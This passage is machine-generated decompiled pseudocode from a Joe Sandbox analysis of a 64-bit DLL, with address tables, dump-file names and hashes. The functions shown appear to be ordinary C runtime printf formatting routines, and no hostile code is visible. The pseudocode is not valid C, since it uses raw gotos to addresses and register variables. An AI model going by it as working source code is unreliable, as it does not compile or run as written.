                                                                      				if (r8d == 0) goto 0x8002c853;
                                                                      				_v88 =  *((intOrPtr*)(_t252 + 8));
                                                                      				_t142 = E000000011800360A4(_t141, _t171, _t175, _t252, _t293, _t275, _t277, _t279, _t275);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t252 + 0x48)) goto 0x8002c7f9;
                                                                      				goto 0x8002c874;
                                                                      				 *_t275 =  *_t275 | 0xffffffff;
                                                                      				goto 0x8002c874;
                                                                      				r8d =  *(_t252 + 0x48);
                                                                      				_t261 = _t293;
                                                                      				_v88 =  *((intOrPtr*)(_t252 + 8));
                                                                      				E000000011800360A4(_t142, _t171, _t175, _t252, _t261, _t275, _t277, _t279, _t275);
                                                                      				_t161 =  *_t275;
                                                                      				if (_t161 < 0) goto 0x8002c8d1;
                                                                      				if ((r13b &  *(_t252 + 0x28) >> 0x00000002) == 0) goto 0x8002c8d1;
                                                                      				r8d = 0;
                                                                      				if (_t175 <= 0) goto 0x8002c8d1;
                                                                      				_t273 =  *_t293;
                                                                      				if ( *((intOrPtr*)(_t273 + 0x10)) !=  *((intOrPtr*)(_t273 + 8))) goto 0x8002c8aa;
                                                                      				if ( *((char*)(_t273 + 0x18)) == 0) goto 0x8002c8a3;
                                                                      				goto 0x8002c8a6;
                                                                      				 *_t275 = _t161 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c8c4;
                                                                      				 *_t275 = _t261 + 1;
                                                                      				 *((intOrPtr*)(_t273 + 0x10)) =  *((intOrPtr*)(_t273 + 0x10)) + _t292;
                                                                      				 *((char*)( *((intOrPtr*)( *_t293)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t293)) =  *((intOrPtr*)( *_t293)) + _t292;
                                                                      				if ( *_t275 == 0xffffffff) goto 0x8002c8d1;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t175 < 0) goto 0x8002c88c;
                                                                      				return E000000011800028F0(r13b,  *_t275, _v56 ^ _t280 - 0x00000050);
                                                                      			}


































                                                                      0x18002c51c
                                                                      0x18002c51c
                                                                      0x18002c51c
                                                                      0x18002c51c
                                                                      0x18002c51c
                                                                      0x18002c521
                                                                      0x18002c526
                                                                      0x18002c534
                                                                      0x18002c53b
                                                                      0x18002c545
                                                                      0x18002c549
                                                                      0x18002c54c
                                                                      0x18002c54f
                                                                      0x18002c555
                                                                      0x18002c558
                                                                      0x18002c55b
                                                                      0x18002c55e
                                                                      0x18002c560
                                                                      0x18002c562
                                                                      0x18002c56b
                                                                      0x18002c573
                                                                      0x18002c577
                                                                      0x18002c57f
                                                                      0x18002c587
                                                                      0x18002c58c
                                                                      0x18002c590
                                                                      0x18002c594
                                                                      0x18002c59c
                                                                      0x18002c5a4
                                                                      0x18002c5a9
                                                                      0x18002c5ae
                                                                      0x18002c5b3
                                                                      0x18002c5b8
                                                                      0x18002c5bd
                                                                      0x18002c5c1
                                                                      0x18002c5c5
                                                                      0x18002c5c9
                                                                      0x18002c5cd
                                                                      0x18002c5d1
                                                                      0x18002c5d5
                                                                      0x18002c5d9
                                                                      0x18002c5de
                                                                      0x18002c5e2
                                                                      0x18002c5e4
                                                                      0x18002c5e9
                                                                      0x18002c5eb
                                                                      0x18002c5f2
                                                                      0x18002c5f9
                                                                      0x18002c5fb
                                                                      0x18002c606
                                                                      0x18002c608
                                                                      0x18002c60c
                                                                      0x18002c614
                                                                      0x18002c619
                                                                      0x18002c61b
                                                                      0x18002c620
                                                                      0x18002c622
                                                                      0x18002c628
                                                                      0x18002c62d
                                                                      0x18002c636
                                                                      0x18002c63a
                                                                      0x18002c646
                                                                      0x18002c64f
                                                                      0x18002c659
                                                                      0x18002c65f
                                                                      0x18002c664
                                                                      0x18002c66a
                                                                      0x18002c675
                                                                      0x18002c67f
                                                                      0x18002c681
                                                                      0x18002c685
                                                                      0x18002c68a
                                                                      0x18002c68c
                                                                      0x18002c690
                                                                      0x18002c699
                                                                      0x18002c69b
                                                                      0x18002c69f
                                                                      0x18002c6a2
                                                                      0x18002c6ae
                                                                      0x18002c6b8
                                                                      0x18002c6ba
                                                                      0x18002c6bd
                                                                      0x18002c6bf
                                                                      0x18002c6d0
                                                                      0x18002c6d4
                                                                      0x18002c6d6
                                                                      0x18002c6de
                                                                      0x18002c6e3
                                                                      0x18002c6e5
                                                                      0x18002c6e8
                                                                      0x18002c6f6
                                                                      0x18002c6fc
                                                                      0x18002c6fe
                                                                      0x18002c703
                                                                      0x18002c708
                                                                      0x18002c717
                                                                      0x18002c71e
                                                                      0x18002c722
                                                                      0x18002c727
                                                                      0x18002c72a
                                                                      0x18002c72f
                                                                      0x18002c732
                                                                      0x18002c740
                                                                      0x18002c74a
                                                                      0x18002c753
                                                                      0x18002c755
                                                                      0x18002c75b
                                                                      0x18002c761
                                                                      0x18002c761
                                                                      0x18002c765
                                                                      0x18002c768
                                                                      0x18002c76d
                                                                      0x18002c76d
                                                                      0x18002c777
                                                                      0x18002c77e
                                                                      0x18002c783
                                                                      0x18002c78e
                                                                      0x18002c796
                                                                      0x18002c798
                                                                      0x18002c79d
                                                                      0x18002c7a1
                                                                      0x18002c7ac
                                                                      0x18002c7b2
                                                                      0x18002c7b6
                                                                      0x18002c7bb
                                                                      0x18002c7bd
                                                                      0x18002c7c2
                                                                      0x18002c7c4
                                                                      0x18002c7ce
                                                                      0x18002c7d4
                                                                      0x18002c7dc
                                                                      0x18002c7de
                                                                      0x18002c7e4
                                                                      0x18002c7ea
                                                                      0x18002c7f0
                                                                      0x18002c7f6
                                                                      0x18002c7fd
                                                                      0x18002c801
                                                                      0x18002c806
                                                                      0x18002c80a
                                                                      0x18002c813
                                                                      0x18002c819
                                                                      0x18002c825
                                                                      0x18002c827
                                                                      0x18002c82e
                                                                      0x18002c83b
                                                                      0x18002c843
                                                                      0x18002c848
                                                                      0x18002c84f
                                                                      0x18002c851
                                                                      0x18002c853
                                                                      0x18002c856
                                                                      0x18002c85f
                                                                      0x18002c863
                                                                      0x18002c86a
                                                                      0x18002c86f
                                                                      0x18002c874
                                                                      0x18002c878
                                                                      0x18002c883
                                                                      0x18002c885
                                                                      0x18002c88a
                                                                      0x18002c88c
                                                                      0x18002c897
                                                                      0x18002c89d
                                                                      0x18002c8a1
                                                                      0x18002c8a6
                                                                      0x18002c8a8
                                                                      0x18002c8ad
                                                                      0x18002c8af
                                                                      0x18002c8b9
                                                                      0x18002c8bf
                                                                      0x18002c8c7
                                                                      0x18002c8c9
                                                                      0x18002c8cf
                                                                      0x18002c8fd

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8a8d41fc61695c878332158b9cac74ba3b8bcce55a21fb0a36cc0bbcf1e3d647
                                                                      • Instruction ID: b2487138579ef4ceedcf3a30791ad794459cdfdcb9ab9230d20447d553ae8756
                                                                      • Opcode Fuzzy Hash: 8a8d41fc61695c878332158b9cac74ba3b8bcce55a21fb0a36cc0bbcf1e3d647
                                                                      • Instruction Fuzzy Hash: 71D1DE7660464C8AEBAB8F298004BED27A1F70DBC8F54D206EE49477D5CF35CA4AC742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E0000000118002C150(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t108;
                                                                      				void* _t111;
                                                                      				void* _t140;
                                                                      				unsigned int _t147;
                                                                      				signed char _t148;
                                                                      				unsigned int _t153;
                                                                      				signed int _t159;
                                                                      				void* _t169;
                                                                      				void* _t172;
                                                                      				void* _t173;
                                                                      				signed long long _t231;
                                                                      				void* _t247;
                                                                      				intOrPtr* _t252;
                                                                      				intOrPtr* _t256;
                                                                      				void* _t260;
                                                                      				void* _t261;
                                                                      				intOrPtr _t264;
                                                                      				intOrPtr _t268;
                                                                      				signed int* _t270;
                                                                      				void* _t274;
                                                                      				void* _t275;
                                                                      				void* _t278;
                                                                      				intOrPtr _t279;
                                                                      				void* _t287;
                                                                      				intOrPtr* _t288;
                                                                      
                                                                      				_t278 = __r8;
                                                                      				_t272 = __rsi;
                                                                      				_t260 = __rdx;
                                                                      				_t169 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t274 = _t275;
                                                                      				_t231 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t231 ^ _t275 - 0x00000050;
                                                                      				_t108 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t247 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t173 = _t108 - 0x64;
                                                                      				if (_t173 > 0) goto 0x8002c1f3;
                                                                      				if (_t173 == 0) goto 0x8002c256;
                                                                      				if (_t108 == r14b) goto 0x8002c263;
                                                                      				if (_t108 == 0x43) goto 0x8002c1d6;
                                                                      				if (_t108 - 0x44 <= 0) goto 0x8002c26c;
                                                                      				if (_t108 - 0x47 <= 0) goto 0x8002c263;
                                                                      				if (_t108 == 0x53) goto 0x8002c218;
                                                                      				if (_t108 == sil) goto 0x8002c1e9;
                                                                      				if (_t108 == 0x5a) goto 0x8002c1e2;
                                                                      				if (_t108 == 0x61) goto 0x8002c263;
                                                                      				if (_t108 != 0x63) goto 0x8002c26c;
                                                                      				E000000011800312C0(_t108, _t108 - 0x63, __rcx);
                                                                      				goto 0x8002c268;
                                                                      				E0000000118002EE44(__rcx);
                                                                      				goto 0x8002c268;
                                                                      				_t111 = E0000000118001E91C(r13b, __rcx, __rcx, _t260, __rsi, _t274, _t278, __r10);
                                                                      				goto 0x8002c268;
                                                                      				if (_t111 - 0x67 <= 0) goto 0x8002c263;
                                                                      				if (_t111 == 0x69) goto 0x8002c256;
                                                                      				if (_t111 == 0x6e) goto 0x8002c24f;
                                                                      				if (_t111 == 0x6f) goto 0x8002c22f;
                                                                      				if (_t111 == 0x70) goto 0x8002c21f;
                                                                      				if (_t111 == 0x73) goto 0x8002c218;
                                                                      				if (_t111 == 0x75) goto 0x8002c25a;
                                                                      				if (_t111 != dil) goto 0x8002c26c;
                                                                      				goto 0x8002c1ec;
                                                                      				E0000000118003286C(__rcx);
                                                                      				goto 0x8002c268;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002c1e9;
                                                                      				_t147 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x8002c243;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t147;
                                                                      				E0000000118001B90C(0, __rcx, __rcx, _t260, _t272, _t274, _t278, __r10);
                                                                      				goto 0x8002c268;
                                                                      				E00000001180031D30(__rcx, __rcx);
                                                                      				goto 0x8002c268;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001D114(0, __rcx, __rcx, _t260, _t272, _t274, _t278, __r10);
                                                                      				goto 0x8002c268;
                                                                      				if (E0000000118002FA10(0, _t169, __rcx, __rcx, _t272, _t274) != 0) goto 0x8002c273;
                                                                      				goto 0x8002c4f2;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002c4ef;
                                                                      				_t148 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c2c0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c2a5;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002c2bd;
                                                                      				if ((r13b & _t148) == 0) goto 0x8002c2b0;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002c2bd;
                                                                      				if ((r13b & 0) == 0) goto 0x8002c2c0;
                                                                      				_v72 = 0x20;
                                                                      				_t261 = _t287;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x8002c2dd;
                                                                      				if ((r13b & _t148 >> 0x00000005) == 0) goto 0x8002c2dd;
                                                                      				r9b = r13b;
                                                                      				goto 0x8002c2e0;
                                                                      				r9b = 0;
                                                                      				if (r9b != 0) goto 0x8002c2f4;
                                                                      				if ((r8b - r14b & 0xffffff00 | (r8b - r14b & 0x000000df) == 0x00000000) == 0) goto 0x8002c30f;
                                                                      				 *((char*)(_t274 + _t261 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x8002c303;
                                                                      				if (r8b != r14b) goto 0x8002c306;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t274 + _t261 - 0x1f)) = dil;
                                                                      				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t148 & 0x0000000c) != 0) goto 0x8002c37b;
                                                                      				r9d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002c37b;
                                                                      				_t279 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t279 + 0x10)) !=  *((intOrPtr*)(_t279 + 8))) goto 0x8002c34a;
                                                                      				if ( *((char*)(_t279 + 0x18)) == 0) goto 0x8002c342;
                                                                      				goto 0x8002c345;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c36e;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t279 + 0x10)) =  *((intOrPtr*)(_t279 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t287;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002c37b;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t172 < 0) goto 0x8002c326;
                                                                      				_t60 = _t247 + 0x20; // 0x98
                                                                      				_t270 = _t60;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t62 = _t247 + 0x460; // 0x4d8
                                                                      				_t288 = _t62;
                                                                      				_t252 = _t288;
                                                                      				E000000011800360A4(__rcx + 1, _t169, _t172, __rcx, _t252, _t270, _t272, _t274, _t270);
                                                                      				_t153 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t153 >> 0x00000003) == 0) goto 0x8002c404;
                                                                      				if ((r13b & _t153 >> 0x00000002) != 0) goto 0x8002c404;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002c404;
                                                                      				_t264 =  *_t288;
                                                                      				if ( *((intOrPtr*)(_t264 + 0x10)) !=  *((intOrPtr*)(_t264 + 8))) goto 0x8002c3dd;
                                                                      				if ( *((char*)(_t264 + 0x18)) == 0) goto 0x8002c3d6;
                                                                      				goto 0x8002c3d9;
                                                                      				 *_t270 =  *_t270 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c3f7;
                                                                      				 *_t270 = _t252 + 1;
                                                                      				 *((intOrPtr*)(_t264 + 0x10)) =  *((intOrPtr*)(_t264 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *_t288)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t288)) =  *((intOrPtr*)( *_t288)) + _t287;
                                                                      				if ( *_t270 == 0xffffffff) goto 0x8002c404;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x8002c3bf;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002c476;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002c476;
                                                                      				r14d = 0;
                                                                      				_t79 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t80 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t80, _t79, _t274, _t279) != 0) goto 0x8002c471;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8002c471;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				_t140 = E000000011800360A4(_t139, _t169, _t172, _t247, _t288, _t270, _t272, _t274, _t270);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t247 + 0x48)) goto 0x8002c417;
                                                                      				goto 0x8002c492;
                                                                      				 *_t270 =  *_t270 | 0xffffffff;
                                                                      				goto 0x8002c492;
                                                                      				r8d =  *(_t247 + 0x48);
                                                                      				_t256 = _t288;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				E000000011800360A4(_t140, _t169, _t172, _t247, _t256, _t270, _t272, _t274, _t270);
                                                                      				_t159 =  *_t270;
                                                                      				if (_t159 < 0) goto 0x8002c4ef;
                                                                      				if ((r13b &  *(_t247 + 0x28) >> 0x00000002) == 0) goto 0x8002c4ef;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002c4ef;
                                                                      				_t268 =  *_t288;
                                                                      				if ( *((intOrPtr*)(_t268 + 0x10)) !=  *((intOrPtr*)(_t268 + 8))) goto 0x8002c4c8;
                                                                      				if ( *((char*)(_t268 + 0x18)) == 0) goto 0x8002c4c1;
                                                                      				goto 0x8002c4c4;
                                                                      				 *_t270 = _t159 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002c4e2;
                                                                      				 *_t270 = _t256 + 1;
                                                                      				 *((intOrPtr*)(_t268 + 0x10)) =  *((intOrPtr*)(_t268 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *_t288)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t288)) =  *((intOrPtr*)( *_t288)) + _t287;
                                                                      				if ( *_t270 == 0xffffffff) goto 0x8002c4ef;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x8002c4aa;
                                                                      				return E000000011800028F0(r13b,  *_t270, _v56 ^ _t275 - 0x00000050);
                                                                      			}



































                                                                      0x18002c150
                                                                      0x18002c150
                                                                      0x18002c150
                                                                      0x18002c150
                                                                      0x18002c150
                                                                      0x18002c155
                                                                      0x18002c15a
                                                                      0x18002c168
                                                                      0x18002c16f
                                                                      0x18002c179
                                                                      0x18002c17d
                                                                      0x18002c180
                                                                      0x18002c183
                                                                      0x18002c189
                                                                      0x18002c18c
                                                                      0x18002c18f
                                                                      0x18002c192
                                                                      0x18002c194
                                                                      0x18002c196
                                                                      0x18002c19f
                                                                      0x18002c1a7
                                                                      0x18002c1ab
                                                                      0x18002c1b3
                                                                      0x18002c1bb
                                                                      0x18002c1c0
                                                                      0x18002c1c4
                                                                      0x18002c1c8
                                                                      0x18002c1d0
                                                                      0x18002c1d8
                                                                      0x18002c1dd
                                                                      0x18002c1e2
                                                                      0x18002c1e7
                                                                      0x18002c1ec
                                                                      0x18002c1f1
                                                                      0x18002c1f5
                                                                      0x18002c1f9
                                                                      0x18002c1fd
                                                                      0x18002c201
                                                                      0x18002c205
                                                                      0x18002c209
                                                                      0x18002c20d
                                                                      0x18002c212
                                                                      0x18002c216
                                                                      0x18002c218
                                                                      0x18002c21d
                                                                      0x18002c21f
                                                                      0x18002c226
                                                                      0x18002c22d
                                                                      0x18002c22f
                                                                      0x18002c23a
                                                                      0x18002c23c
                                                                      0x18002c240
                                                                      0x18002c248
                                                                      0x18002c24d
                                                                      0x18002c24f
                                                                      0x18002c254
                                                                      0x18002c256
                                                                      0x18002c25c
                                                                      0x18002c261
                                                                      0x18002c26a
                                                                      0x18002c26e
                                                                      0x18002c277
                                                                      0x18002c27d
                                                                      0x18002c282
                                                                      0x18002c288
                                                                      0x18002c293
                                                                      0x18002c29d
                                                                      0x18002c29f
                                                                      0x18002c2a3
                                                                      0x18002c2a8
                                                                      0x18002c2aa
                                                                      0x18002c2ae
                                                                      0x18002c2b7
                                                                      0x18002c2b9
                                                                      0x18002c2bd
                                                                      0x18002c2c0
                                                                      0x18002c2cc
                                                                      0x18002c2d6
                                                                      0x18002c2d8
                                                                      0x18002c2db
                                                                      0x18002c2dd
                                                                      0x18002c2ee
                                                                      0x18002c2f2
                                                                      0x18002c2f4
                                                                      0x18002c2fc
                                                                      0x18002c301
                                                                      0x18002c303
                                                                      0x18002c306
                                                                      0x18002c314
                                                                      0x18002c31a
                                                                      0x18002c31c
                                                                      0x18002c321
                                                                      0x18002c326
                                                                      0x18002c335
                                                                      0x18002c33c
                                                                      0x18002c340
                                                                      0x18002c345
                                                                      0x18002c348
                                                                      0x18002c34d
                                                                      0x18002c350
                                                                      0x18002c35e
                                                                      0x18002c368
                                                                      0x18002c371
                                                                      0x18002c373
                                                                      0x18002c379
                                                                      0x18002c37f
                                                                      0x18002c37f
                                                                      0x18002c383
                                                                      0x18002c386
                                                                      0x18002c38b
                                                                      0x18002c38b
                                                                      0x18002c395
                                                                      0x18002c39c
                                                                      0x18002c3a1
                                                                      0x18002c3ac
                                                                      0x18002c3b4
                                                                      0x18002c3b6
                                                                      0x18002c3bb
                                                                      0x18002c3bf
                                                                      0x18002c3ca
                                                                      0x18002c3d0
                                                                      0x18002c3d4
                                                                      0x18002c3d9
                                                                      0x18002c3db
                                                                      0x18002c3e0
                                                                      0x18002c3e2
                                                                      0x18002c3ec
                                                                      0x18002c3f2
                                                                      0x18002c3fa
                                                                      0x18002c3fc
                                                                      0x18002c402
                                                                      0x18002c408
                                                                      0x18002c40e
                                                                      0x18002c414
                                                                      0x18002c41b
                                                                      0x18002c41f
                                                                      0x18002c424
                                                                      0x18002c428
                                                                      0x18002c431
                                                                      0x18002c437
                                                                      0x18002c443
                                                                      0x18002c445
                                                                      0x18002c44c
                                                                      0x18002c459
                                                                      0x18002c461
                                                                      0x18002c466
                                                                      0x18002c46d
                                                                      0x18002c46f
                                                                      0x18002c471
                                                                      0x18002c474
                                                                      0x18002c47d
                                                                      0x18002c481
                                                                      0x18002c488
                                                                      0x18002c48d
                                                                      0x18002c492
                                                                      0x18002c496
                                                                      0x18002c4a1
                                                                      0x18002c4a3
                                                                      0x18002c4a8
                                                                      0x18002c4aa
                                                                      0x18002c4b5
                                                                      0x18002c4bb
                                                                      0x18002c4bf
                                                                      0x18002c4c4
                                                                      0x18002c4c6
                                                                      0x18002c4cb
                                                                      0x18002c4cd
                                                                      0x18002c4d7
                                                                      0x18002c4dd
                                                                      0x18002c4e5
                                                                      0x18002c4e7
                                                                      0x18002c4ed
                                                                      0x18002c51b

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae38091a4e9164ee0da1e0840a1ce4f6a92cc278b8cf9f32f03f71371aba9385
                                                                      • Instruction ID: 0c851bea1a75168f7d481c0b78bcc101433a59e6be09235584b3e2cb2822fb5c
                                                                      • Opcode Fuzzy Hash: ae38091a4e9164ee0da1e0840a1ce4f6a92cc278b8cf9f32f03f71371aba9385
                                                                      • Instruction Fuzzy Hash: 98D1CD7260464C86EBAB8B698010BEE27A1E74DBC8F14C206EE59476D5DF35CA4EC352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E0000000118002C900(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t108;
                                                                      				void* _t111;
                                                                      				void* _t140;
                                                                      				unsigned int _t147;
                                                                      				signed char _t148;
                                                                      				unsigned int _t153;
                                                                      				signed int _t159;
                                                                      				void* _t169;
                                                                      				void* _t172;
                                                                      				void* _t173;
                                                                      				signed long long _t231;
                                                                      				void* _t247;
                                                                      				intOrPtr* _t252;
                                                                      				intOrPtr* _t256;
                                                                      				void* _t260;
                                                                      				void* _t261;
                                                                      				intOrPtr _t264;
                                                                      				intOrPtr _t268;
                                                                      				signed int* _t270;
                                                                      				void* _t274;
                                                                      				void* _t275;
                                                                      				void* _t278;
                                                                      				intOrPtr _t279;
                                                                      				void* _t287;
                                                                      				intOrPtr* _t288;
                                                                      
                                                                      				_t278 = __r8;
                                                                      				_t272 = __rsi;
                                                                      				_t260 = __rdx;
                                                                      				_t169 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t274 = _t275;
                                                                      				_t231 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t231 ^ _t275 - 0x00000050;
                                                                      				_t108 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t247 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t173 = _t108 - 0x64;
                                                                      				if (_t173 > 0) goto 0x8002c9a3;
                                                                      				if (_t173 == 0) goto 0x8002ca06;
                                                                      				if (_t108 == r14b) goto 0x8002ca13;
                                                                      				if (_t108 == 0x43) goto 0x8002c986;
                                                                      				if (_t108 - 0x44 <= 0) goto 0x8002ca1c;
                                                                      				if (_t108 - 0x47 <= 0) goto 0x8002ca13;
                                                                      				if (_t108 == 0x53) goto 0x8002c9c8;
                                                                      				if (_t108 == sil) goto 0x8002c999;
                                                                      				if (_t108 == 0x5a) goto 0x8002c992;
                                                                      				if (_t108 == 0x61) goto 0x8002ca13;
                                                                      				if (_t108 != 0x63) goto 0x8002ca1c;
                                                                      				E00000001180031490(_t108, _t108 - 0x63, __rcx);
                                                                      				goto 0x8002ca18;
                                                                      				E0000000118002EF64(__rcx);
                                                                      				goto 0x8002ca18;
                                                                      				_t111 = E0000000118001ED30(r13b, __rcx, __rcx, _t260, __rsi, _t274, _t278, __r10);
                                                                      				goto 0x8002ca18;
                                                                      				if (_t111 - 0x67 <= 0) goto 0x8002ca13;
                                                                      				if (_t111 == 0x69) goto 0x8002ca06;
                                                                      				if (_t111 == 0x6e) goto 0x8002c9ff;
                                                                      				if (_t111 == 0x6f) goto 0x8002c9df;
                                                                      				if (_t111 == 0x70) goto 0x8002c9cf;
                                                                      				if (_t111 == 0x73) goto 0x8002c9c8;
                                                                      				if (_t111 == 0x75) goto 0x8002ca0a;
                                                                      				if (_t111 != dil) goto 0x8002ca1c;
                                                                      				goto 0x8002c99c;
                                                                      				E000000011800329BC(__rcx);
                                                                      				goto 0x8002ca18;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002c999;
                                                                      				_t147 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x8002c9f3;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t147;
                                                                      				E0000000118001BD20(0, __rcx, __rcx, _t260, _t272, _t274, _t278, __r10);
                                                                      				goto 0x8002ca18;
                                                                      				E00000001180031EC8(__rcx, __rcx);
                                                                      				goto 0x8002ca18;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001D528(0, __rcx, __rcx, _t260, _t272, _t274, _t278, __r10);
                                                                      				goto 0x8002ca18;
